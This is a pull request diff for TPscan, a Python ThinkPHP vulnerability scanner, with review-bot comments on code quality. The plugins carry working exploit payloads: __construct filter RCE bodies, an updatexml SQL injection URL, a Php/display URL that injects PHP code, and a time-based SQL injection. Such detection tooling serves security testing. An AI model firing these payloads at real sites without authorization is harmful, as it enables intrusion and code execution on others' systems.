2023.11.01更新检测回显 #13

Open
wants to merge 1 commit into
base: master
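--- a/.gitignore
+++ b/.gitignore
@@ -0,0 +1,2 @@
+.idea
+*__pycache__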
2 changes: 2 additions & 0 deletions README.md
@@ -1,2 +1,4 @@
# TPscan
一键ThinkPHP漏洞检测,基于Python3

![](https://raw.githubusercontent.com/pfinal-nc/iGallery/master/blog/202311011758502.png)
13 changes: 10 additions & 3 deletions TPscan.py
@@ -1,7 +1,10 @@
#!/usr/bin/env python
# coding=utf-8
from gevent import monkey;monkey.patch_all()
from gevent import monkey;

monkey.patch_all()
from gevent.pool import Pool
from termcolor import colored
from plugins.thinkphp_checkcode_time_sqli import thinkphp_checkcode_time_sqli_verify
from plugins.thinkphp_construct_code_exec import thinkphp_construct_code_exec_verify
from plugins.thinkphp_construct_debug_rce import thinkphp_construct_debug_rce_verify
Expand All @@ -19,6 +22,7 @@

import sys
import gevent

print('''
___________
|_ _| ___ \
Expand All @@ -29,7 +33,8 @@
code by Lucifer
''')
targeturl = input("[*]Give me a target: ")
if targeturl.find('http') == -1:
if targeturl.find('http') == -1 and targeturl.find('https') == -1:
print(colored("\n[*]Please input a valid url!", "red"))
exit(1)
poclist = [
'thinkphp_checkcode_time_sqli_verify("{0}")'.format(targeturl),
Expand All @@ -48,10 +53,12 @@
'thinkphp_view_recent_xff_sqli_verify("{0}")'.format(targeturl),
]


def pocexec(pocstr):
exec(pocstr)
gevent.sleep(0)


pool = Pool(10)
threads = [pool.spawn(pocexec, item) for item in poclist]
gevent.joinall(threads)
gevent.joinall(threads)
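Review bot: The target URL is still formatted into Python source strings in `poclist` and run through `exec(pocstr)` in `pocexec`, so a quote character in the input ends the string literal and whatever follows is executed as code in the operator's own process; the tightened check above it does not prevent that. Storing the imported callables and passing the URL as an argument removes the need for `exec`: `poclist = [thinkphp_checkcode_time_sqli_verify, ...]` and `threads = [pool.spawn(poc, targeturl) for poc in poclist]`. The added `targeturl.find('https') == -1` clause is also redundant, since any string containing `https` contains `http`, and `find` matches anywhere in the input; `urllib.parse.urlparse(targeturl).scheme not in ('http', 'https')` would check the scheme itself. Parts of the import list and of `poclist` are collapsed on this page.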
Empty file added img.png
31 changes: 20 additions & 11 deletions plugins/thinkphp_checkcode_time_sqli.py
Expand Up @@ -2,22 +2,28 @@
# coding=utf-8
import time
import urllib

import requests
import urllib3
from termcolor import colored

urllib3.disable_warnings()


def thinkphp_checkcode_time_sqli_verify(url):
"""thinkphp_checkcode_time_sqli_verify"""

pocdict = {
"vulnname":"thinkphp_checkcode_time_sqli",
"vulnname": "thinkphp_checkcode_time_sqli",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
"vulnurl": "",
"payload": "",
"proof": "",
"response": "",
"exception": "",
}
headers = {
"User-Agent" : "TPscan",
"User-Agent": "TPscan",
"DNT": "1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Content-Type": "multipart/form-data; boundary=--------641902708",
Expand All @@ -34,8 +40,11 @@ def thinkphp_checkcode_time_sqli_verify(url):
pocdict['vulnurl'] = vurl
pocdict['payload'] = payload
pocdict['proof'] = 'time sleep 15'
pocdict['response'] = req.text
print(pocdict)

except:
pocdict['response'] = req.status_code
print(colored("[+] 目标存在 thinkphp_checkcode_time_sqli 漏洞\tpayload: ", "green"))
print(colored(pocdict, 'green'))
else:
print(colored("\n[*] 目标不存在 thinkphp_checkcode_time_sqli 漏洞", "red"))
except Exception as e:
print(colored("\n[*] 目标不存在 thinkphp_checkcode_time_sqli 漏洞", "red"))
pass
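Review bot: The new `except Exception as e:` branch prints the "目标不存在 … 漏洞" (not vulnerable) line for any exception, so a timeout, DNS failure or TLS error is reported as a clean result even though the check never completed. `e` is unused and the `exception` key of `pocdict` stays empty; recording it and printing an inconclusive result would keep failed checks apart from real negatives, e.g. `pocdict['exception'] = str(e)` followed by `print(colored("[!] thinkphp_checkcode_time_sqli check failed: {0}".format(e), "yellow"))`. The same verdict-on-error pattern, under a bare `except:`, is added in plugins/thinkphp_construct_debug_rce.py, thinkphp_debug_index_ids_sqli.py, thinkphp_driver_display_rce.py and thinkphp_index_construct_rce.py. The request and the timing condition of this function are collapsed on this page, so how a request timeout interacts with the 15-second sleep proof cannot be judged from here.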
34 changes: 20 additions & 14 deletions plugins/thinkphp_construct_code_exec.py
Expand Up @@ -3,26 +3,30 @@
import urllib
import requests
import urllib3
from termcolor import colored

urllib3.disable_warnings()


def thinkphp_construct_code_exec_verify(url):
"""thinkphp_construct_code_exec_verify"""
pocdict = {
"vulnname":"thinkphp_construct_code_exec",
"vulnname": "thinkphp_construct_code_exec",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
"vulnurl": "",
"payload": "",
"proof": "",
"response": "",
"exception": "",
}
headers = {
"User-Agent" : "TPscan",
"User-Agent": "TPscan",
}
payload = {
'_method':'__construct',
'filter[]':'var_dump',
'method':'get',
'server[REQUEST_METHOD]':'f7e0b956540676a129760a3eae309294',
'_method': '__construct',
'filter[]': 'var_dump',
'method': 'get',
'server[REQUEST_METHOD]': 'f7e0b956540676a129760a3eae309294',
}
try:
vurl = urllib.parse.urljoin(url, 'index.php?s=captcha')
Expand All @@ -32,8 +36,10 @@ def thinkphp_construct_code_exec_verify(url):
pocdict['vulnurl'] = vurl
pocdict['payload'] = payload
pocdict['proof'] = '56540676a129760a3ea'
pocdict['response'] = req.text
print(pocdict)

pocdict['response'] = req.status_code
print(colored("[+] 目标存在 thinkphp_construct_code_exec 漏洞\tpayload: ", "green"))
print(colored(pocdict, 'green'))
else:
print(colored("\n[*] 目标不存在 thinkphp_construct_code_exec 漏洞", "red"))
except:
pass
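Review bot: This plugin keeps the bare `except:` / `pass` at the end of `thinkphp_construct_code_exec_verify`, so with the new output a failed request prints nothing at all while every other outcome prints a coloured line, and an operator cannot tell a skipped check from one that ran. Narrowing it to `except requests.RequestException as e:` and storing `pocdict['exception'] = str(e)` before printing a check-failed line would make the run's coverage visible. A bare `except:` also catches `KeyboardInterrupt`, which makes a long scan harder to stop. The request call itself is collapsed on this page.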
33 changes: 20 additions & 13 deletions plugins/thinkphp_construct_debug_rce.py
Expand Up @@ -3,25 +3,29 @@
import urllib
import requests
import urllib3

urllib3.disable_warnings()
from termcolor import colored


def thinkphp_construct_debug_rce_verify(url):
"""thinkphp_construct_debug_rce_verify"""
pocdict = {
"vulnname":"thinkphp_construct_debug_rce",
"vulnname": "thinkphp_construct_debug_rce",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
"vulnurl": "",
"payload": "",
"proof": "",
"response": "",
"exception": "",
}
headers = {
"User-Agent" : "TPscan",
"User-Agent": "TPscan",
}
payload = {
'_method':'__construct',
'filter[]':'var_dump',
'server[REQUEST_METHOD]':'f7e0b956540676a129760a3eae309294',
'_method': '__construct',
'filter[]': 'var_dump',
'server[REQUEST_METHOD]': 'f7e0b956540676a129760a3eae309294',
}
try:
vurl = urllib.parse.urljoin(url, 'index.php')
Expand All @@ -31,8 +35,11 @@ def thinkphp_construct_debug_rce_verify(url):
pocdict['vulnurl'] = vurl
pocdict['payload'] = payload
pocdict['proof'] = '56540676a129760a3'
pocdict['response'] = req.text
print(pocdict)

pocdict['response'] = req.status_code
print(colored("[+] 目标存在 thinkphp_construct_debug_rce 漏洞\tpayload: ", "green"))
print(colored(pocdict, 'green'))
else:
print(colored("\n[*] 目标不存在 thinkphp_construct_debug_rce 漏洞", "red"))
except:
print(colored("\n[*] 目标不存在 thinkphp_construct_debug_rce 漏洞", "red"))
pass
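Review bot: `from termcolor import colored` is added below the `urllib3.disable_warnings()` call, leaving an import after executable module code; plugins/thinkphp_checkcode_time_sqli.py and thinkphp_construct_code_exec.py in this same change place it with the other imports. Moving the line up next to `import urllib3` keeps the plugins uniform. The same ordering appears in thinkphp_debug_index_ids_sqli.py, thinkphp_driver_display_rce.py and thinkphp_index_construct_rce.py.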
27 changes: 17 additions & 10 deletions plugins/thinkphp_debug_index_ids_sqli.py
Expand Up @@ -3,20 +3,24 @@
import urllib
import requests
import urllib3

urllib3.disable_warnings()
from termcolor import colored


def thinkphp_debug_index_ids_sqli_verify(url):
"""thinkphp_debug_index_ids_sqli_verify"""
pocdict = {
"vulnname":"thinkphp_debug_index_ids_sqli",
"vulnname": "thinkphp_debug_index_ids_sqli",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
"vulnurl": "",
"payload": "",
"proof": "",
"response": "",
"exception": "",
}
headers = {
"User-Agent" : "TPscan",
"User-Agent": "TPscan",
}
payload = 'index.php?ids[0,UpdAtexml(0,ConcAt(0xa,Md5(2333)),0)]=1'
try:
Expand All @@ -26,8 +30,11 @@ def thinkphp_debug_index_ids_sqli_verify(url):
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['proof'] = '56540676a129760'
pocdict['response'] = req.text
print(pocdict)

pocdict['response'] = req.status_code
print(colored("[+] 目标存在 thinkphp_debug_index_ids_sqli 漏洞\tpayload: ", "green"))
print(colored(pocdict, 'green'))
else:
print(colored("\n[*] 目标不存在 thinkphp_debug_index_ids_sqli 漏洞", "red"))
except:
print(colored("\n[*] 目标不存在 thinkphp_debug_index_ids_sqli 漏洞", "red"))
pass
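Review bot: The success message ends with the label "payload: ", but in the lines visible here the success branch sets only `isvul`, `vulnurl`, `proof` and `response`, so the printed dict would show `'payload': ''`. Adding `pocdict['payload'] = payload` next to the `vulnurl` assignment would make the output match its label; plugins/thinkphp_driver_display_rce.py has the same gap. Part of the `try` block is collapsed on this page, so confirm the key is not already filled there.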
27 changes: 17 additions & 10 deletions plugins/thinkphp_driver_display_rce.py
Expand Up @@ -3,20 +3,24 @@
import urllib
import requests
import urllib3

urllib3.disable_warnings()
from termcolor import colored


def thinkphp_driver_display_rce_verify(url):
"""thinkphp_driver_display_rce_verify"""
pocdict = {
"vulnname":"thinkphp_driver_display_rce",
"vulnname": "thinkphp_driver_display_rce",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
"vulnurl": "",
"payload": "",
"proof": "",
"response": "",
"exception": "",
}
headers = {
"User-Agent" : 'TPscan',
"User-Agent": 'TPscan',
}
try:
vurl = urllib.parse.urljoin(url, 'index.php?s=index/\\think\\view\driver\Php/display&content=%3C?php%20var_dump(md5(2333));?%3E')
Expand All @@ -25,8 +29,11 @@ def thinkphp_driver_display_rce_verify(url):
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['proof'] = '56540676a129760a'
pocdict['response'] = req.text
print(pocdict)

pocdict['response'] = req.status_code
print(colored("[+] 目标存在 thinkphp_driver_display_rce 漏洞\tpayload: ", "green"))
print(colored(pocdict, 'green'))
else:
print(colored("\n[*] 目标不存在 thinkphp_driver_display_rce 漏洞", "red"))
except:
print(colored("\n[*] 目标不存在 thinkphp_driver_display_rce 漏洞", "red"))
pass
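Review bot: The `vurl` string literal mixes `\\` with the single-backslash sequences `\d` and `\P`, which are invalid escapes in a normal Python string; they currently pass through unchanged but raise a DeprecationWarning, and a SyntaxWarning from Python 3.12. Writing every backslash in that literal as `\\` keeps the resulting URL byte-identical and removes the warning. This is a context line the commit did not touch, so it could go in a follow-up.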
26 changes: 16 additions & 10 deletions plugins/thinkphp_index_construct_rce.py
Expand Up @@ -3,17 +3,21 @@
import urllib
import requests
import urllib3

urllib3.disable_warnings()
from termcolor import colored


def thinkphp_index_construct_rce_verify(url):
"""thinkphp_index_construct_rce_verify"""
pocdict = {
"vulnname":"thinkphp_index_construct_rce",
"vulnname": "thinkphp_index_construct_rce",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
"vulnurl": "",
"payload": "",
"proof": "",
"response": "",
"exception": "",
}
headers = {
"User-Agent": 'TPscan',
Expand All @@ -28,9 +32,11 @@ def thinkphp_index_construct_rce_verify(url):
pocdict['vulnurl'] = vurl
pocdict['payload'] = payload
pocdict['proof'] = '56540676a129760a3ea'
pocdict['response'] = req.text
print(pocdict)

pocdict['response'] = req.status_code
print(colored("[+] 目标存在 thinkphp_index_construct_rce 漏洞\tpayload: ", "green"))
print(colored(pocdict, 'green'))
else:
print(colored("\n[*] 目标不存在 thinkphp_index_construct_rce 漏洞", "red"))
except:
print(colored("\n[*] 目标不存在 thinkphp_index_construct_rce 漏洞", "red"))
pass
